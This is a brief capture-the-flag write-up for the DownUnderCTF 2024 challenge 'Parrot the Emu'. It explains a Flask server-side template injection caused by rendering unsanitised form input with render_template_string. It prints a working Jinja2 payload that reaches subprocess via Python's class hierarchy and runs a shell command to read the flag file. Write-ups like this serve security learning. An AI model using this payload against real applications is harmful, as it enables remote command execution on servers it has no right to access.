It is so nice to hear Parrot the Emu talk back
Author: richighimi
https://web-parrot-the-emu-4c2d0c693847.2024.ductf.dev
This challenge presents a server-side template injection. In fact, by looking at the server's source code (app.py), we can notice the following snippet of code:
if request.method == 'POST':
user_input = request.form.get('user_input')
try:
result = render_template_string(user_input)
except Exception as e:
result = str(e)
the code takes the user_input without applying sanitization and renders it. This allows us to exploit this vulnerability and insert a malicious template like the following:
{{ ''.__class__.__mro__[1].__subclasses__()[213]('/usr/bin/cat flag', shell=True, stdout=-1).communicate() }}
the aforementioned template allows us to print the output of the flag file, which contains the challenge flag:
| Action | Rating | Author team |
|---|---|---|
| Read writeup |
not rated
|
TeamSerbia |
| Read writeup |
4.0
|
aetruria |
